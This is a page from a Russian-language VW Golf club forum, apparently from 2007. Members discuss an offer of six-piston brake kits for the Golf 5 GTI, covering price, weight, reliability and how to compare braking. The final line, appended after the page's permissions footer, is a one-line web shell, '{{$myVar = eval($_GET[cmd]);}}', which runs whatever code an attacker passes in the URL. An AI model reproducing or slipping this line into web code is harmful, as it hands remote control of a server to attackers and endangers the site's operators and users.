+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 43

Тема: 5 GTI - 6типоршневая Тормозная Система (Предложение-опрос)


  1. #1
    Господа, счастливые обладатели 5ГТИ. В принципе, на машинке уже изначально стоят хорошие тормозишки и по большей части их хватает... Но! Всетаки желание сделать быстрее, лучше и сильнее всегда пересиливает.
    Однако, в этом желании участвует очень сильно "жаба", которая душит их на корню, увидив стоимость счастья. Действительно, платить 3-4 тыщи баксов на тормоза - это круто.
    Но не все так плохо, как думаем. Поступило очень интересно предложение по 6ти поршневым тормозам под 17 и 18 дюймовые колеса. Пока что полной и точной информации нет (особенно это касается стоимости), но ценник будет достаточно адекватный, если учесть, что это 6ти (!!) поршневые суппорта. Посмотреть можно будет на моей машинке гдето через месяцок-полтора, тогда как раз и будет известна цена. А пока фотка таких же тормозов, но с другой машины.

    Ну а собственно вопрос - кому это интересно то вообще? Есть достаточно большая уверенность, что тормоза подойдут и на Г5 обычный (Шкоду, Сеат и прочее), а цена будет 1500$, на них уже ездит очень много машинок, просто по VW только появился интерес в тюнинге.

    Реальные фотки кита!



    ЗЫ: чтоб небыло путаницы - фотки не моей машины и не именно тех комплектов, что есть.. реальные фотки того, что будет я выложу сегодня, как получу. Но смысл такой же.

  2. #2
    GTI-Racing magnum126 is on a distinguished road Аватар для magnum126
    Регистрация
    06.03.2006
    Откуда
    СВАО
    Машина
    opel manta B 1979, VW Derby 1982, VW Golf 6, AUDI A2 s-line, OPEL ZAFIRA COSMO!!
    Сообщений
    3,618
    Красота! думаю тормоза лишними не бывают!!!!!!!!&#33 ;

  3. #3
    Надабрать)

  4. #4
    Член клуба ААГ will become famous soon enough ААГ will become famous soon enough Аватар для ААГ
    Регистрация
    06.03.2006
    Сообщений
    2,332
    <div class='quotetop'>Цитата(Griffin &#064; Oct 18 2007, 10&#58;26) <{POST_SNAPBACK}></div><div class='quotemain'>Господа, счастливые обладатели 5ГТИ. В принципе, на машинке уже изначально стоят хорошие тормозишки и по большей части их хватает... Но&#33; Всетаки желание сделать быстрее, лучше и сильнее всегда пересиливает.
    Однако, в этом желании участвует очень сильно "жаба", которая душит их на корню, увидив стоимость счастья. Действительно, платить 3-4 тыщи баксов на тормоза - это круто.
    Но не все так плохо, как думаем. Поступило очень интересно предложение по 6ти поршневым тормозам под 17 и 18 дюймовые колеса. Пока что полной и точной информации нет (особенно это касается стоимости), но ценник будет достаточно адекватный, если учесть, что это двухсоставные диски и 6ти (&#33;&#33;) поршневые суппорта. Посмотреть можно будет на моей машинке гдето через месяцок-полтора, тогда как раз и будет известна цена. А пока фотка таких же тормозов, но с другой машины.

    Ну а собственно вопрос - кому это интересно то вообще? Есть достаточно большая уверенность, что тормоза подойдут и на Г5 обычный (Шкоду, Сеат и прочее), а цена будет 1500&#036;, на них уже ездит очень много машинок, просто по VW только появился интерес в тюнинге.

    [/b][/quote]

    Что ссотреть то ? ) нужно быдет попробовать торморзнуть. Будет приход - есть смысл поставить.
    Нет - в топку ))
    Можно дурачить всех какое-то время,
    можно дурачить часть людей постоянно,
    но МАМОЧКУ не обманешь
    Закон капитана Пенни
    Трудно спорить со Сталиным - ты ему цитату, а он тебе - ссылку

  5. #5
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    <div class='quotetop'>Цитата(ААГ &#064; Oct 18 2007, 11&#58;44) <{POST_SNAPBACK}></div><div class='quotemain'>Что ссотреть то ? ) нужно быдет попробовать торморзнуть. Будет приход - есть смысл поставить.
    Нет - в топку ))[/b][/quote]
    +1
    а интерес есть.
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

  6. #6
    GTI-Racing Antonio is on a distinguished road Аватар для Antonio
    Регистрация
    08.08.2006
    Машина
    Gti MkV
    Сообщений
    350
    Бюджетно&#33;))но во только как они по надежности?? и кто их производит??

  7. #7
    GTI-Racing john@rallye is on a distinguished road Аватар для john@rallye
    Регистрация
    11.08.2006
    Откуда
    msk
    Машина
    lupo low&slow, mk1 cabrio сток, mk1 cabrio не сток
    Сообщений
    1,049
    <div class='quotetop'>Цитата(ААГ &#064; Oct 18 2007, 11&#58;44) <{POST_SNAPBACK}></div><div class='quotemain'>Что ссотреть то ? ) нужно быдет попробовать торморзнуть. Будет приход - есть смысл поставить.
    Нет - в топку ))[/b][/quote]
    только не просто попробывать а поездить и потормозить... а потом сделать всё тоже самое но на штатных тормозах на идентичной машине (лучше клнечно наоборот: сначала на штатной) =)
    fuckfueleconomy

  8. #8
    GTI-Racing total is on a distinguished road Аватар для total
    Регистрация
    05.12.2006
    Машина
    MkV GTI
    Сообщений
    1,146
    Проще на кольцо выкатить 2 машины по очереди и один человек чтобы ехал и будет понятно какиу эффективнее.
    Time attack
    Mkv gti
    ADM - 1.58,4
    Лидер - 1.02,5
    DC2
    ADM - 1.58,2
    Лидер - 1.01,2
    Smolenskring - 1.48,2
    NNRing - 1.53,8
    Kazanring - 1.43.863

  9. #9
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    В городе у нас лично мне не нужно, достаточно слегка модернизированных, вес больших тормозов не менее важная головная боль и для плохих дорог и для сокращения секунд в разгоне.
    песок сыпется....не останавливайтесь на достигнутом !

  10. #10
    Вес нормальных тормозов ниже штатных
    Про фирму - ставится не на одну машину, и в москве куча уже, бренд на суппорте пишется просто свой.
    Про эффективность - ну смешно сравнивать, ей богу

    ЗЫ: про надежность - за 2 года на машине друга еще не развалились А ездит он по городу далеко не так, как многие из нас (довольно безбашенно, поэтому и поставил их)

+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Тормозная система MKV GTI
    от Евгений GTI в разделе Golf 5
    Ответов: 8
    Последнее сообщение: 02.01.2024, 05:26
  2. Тормозная система TTRS. Bolt-on на Golf
    от Пьеро в разделе Тюнинг
    Ответов: 5
    Последнее сообщение: 22.06.2015, 23:58
  3. Тормозная система. D2 8 и 4 поршневые суппопта
    от jettagtx16v в разделе Покупка и продажа запчастей
    Ответов: 5
    Последнее сообщение: 15.02.2013, 16:00
  4. Тормозная Система От Porsche
    от NickVA в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 5
    Последнее сообщение: 12.08.2008, 17:55
  5. Тормозная система Porsche на Golf IV
    от Verdik в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 89
    Последнее сообщение: 09.11.2007, 10:50

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}